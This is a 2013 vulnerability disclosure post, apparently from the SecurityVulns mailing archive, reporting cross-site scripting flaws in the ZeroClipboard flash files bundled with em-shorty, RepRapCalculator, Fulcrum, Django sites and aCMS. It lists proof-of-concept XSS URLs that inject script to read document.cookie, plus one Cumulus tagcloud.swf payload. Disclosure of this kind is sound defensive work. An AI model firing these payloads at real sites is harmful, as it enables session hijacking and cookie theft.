Информационная безопасность
[RU] switch to English


Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  XSS vulnerabilities in ZeroClipboard

  XSS vulnerabilities in YAML, Multiproject for Trac, UserCollections for Piwigo, TAO and TableTools for DataTables for jQuery

  PHP-Fusion 7.02.05 SQL Injection

  Reflective XSS in Marekkis Watermark-Plugin Cross-Site Scripting Vulnerability

From:MustLive <mustlive_(at)_websecurity.com.ua>
Date:24 февраля 2013 г.
Subject:XSS vulnerabilities in em-shorty, RepRapCalculator, Fulcrum, Django and aCMS


Hello 3APA3A!

After my previous list of vulnerable software with ZeroClipboard.swf, here is a list of software with ZeroClipboard10.swf. These are Cross-Site Scripting vulnerabilities in em-shorty, RepRapCalculator, Fulcrum, Django and aCMS.

Earlier I've wrote about Cross-Site Scripting vulnerabilities in ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103). I wrote that this is very widespread flash-file and it's placed at tens of thousands of web sites. And it's used in hundreds of web applications. Among them are em-shorty, RepRapCalculator, Fulcrum (CMS), Django and aCMS. And there are many other vulnerable web applications with ZeroClipboard10.swf (some of them also contain ZeroClipboard.swf).

-------------------------
Affected products:
-------------------------

Vulnerable are the next web applications with ZeroClipboard:

em-shorty 0.5.0 and previous versions.

RepRapCalculator.

Fulcrum - all versions of this CMS.

Django - there are multiple web sites on Django framework (particularly Django 1.3.1 and Djangoplicity) with ZeroClipboard.

aCMS 1.0.

Both XSS vulnerabilities in ZeroClipboard are fixed in latest version (by new developers) ZeroClipboard 1.1.7. All developers should update swf-file in their software.

----------
Details:
----------

Cross-Site Scripting (WASC-08):

XSS via id parameter and XSS via copying payload into clipboard (as described in the first advisory).

em-shorty:

http://site/public/ZeroClipboard10.
swf?id=\%22))}catch(e){}if(!self.a)self.
a=!alert(document.cookie)//&width&height

RepRapCalculator:

http://site/ZeroClipboard.
swf?id=\%22))}catch(e){}if(!self.a)self.
a=!alert(document.cookie)//&width&height

http://site/ZeroClipboard10.
swf?id=\%22))}catch(e){}if(!self.a)self.
a=!alert(document.cookie)//&width&height

Fulcrum:

http://site/admin/lib/ZeroClipboard.
swf?id=\%22))}catch(e){}if(!self.a)self.
a=!alert(document.cookie)//&width&height

http://site/admin/lib/zeroclipboard/zeroclipboard/ZeroClipboard.
swf?id=\%22))}catch(e){}if(!self.a)self.
a=!alert(document.cookie)//&width&height

http://site/admin/lib/zeroclipboard/zeroclipboard/ZeroClipboard10.
swf?id=\%22))}catch(e){}if(!self.a)self.
a=!alert(document.cookie)//&width&height

Django (different web applications on Django framework):

Django 1.3.1:

http://site/media/js/ZeroClipboard.
swf?id=\%22))}catch(e){}if(!self.a)self.
a=!alert(document.cookie)//&width&height

http://site/media/js/ZeroClipboard10.
swf?id=\%22))}catch(e){}if(!self.a)self.
a=!alert(document.cookie)//&width&height

Djangoplicity:

http://site/static/djangoplicity/js/ZeroClipboard10.
swf?id=\%22))}catch(e){}if(!self.a)self.
a=!alert(document.cookie)//&width&height

http://site/static/js/ZeroClipboard10.swfZeroClipboard10.
swf?id=\%22))}catch(e){}if(!self.a)self.
a=!alert(document.cookie)//&width&height

aCMS:

http://site/assets/swf/ZeroClipboard10.
swf?id=\%22))}catch(e){}if(!self.a)self.
a=!alert(document.cookie)//&width&height

Besides ZeroClipboard, in aCMS there is also Cumulus (tagcloud.swf), vulnerabilities in which I've disclosed (and part of them was fixed) already in 2009. About it you can read in the article XSS vulnerabilities in 34 millions flash files (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-Ja
nuary/006033.html
)

http://site/assets/swf/tagcloud.
swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:
alert(document.cookie)%27+style=%27font-size:
+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород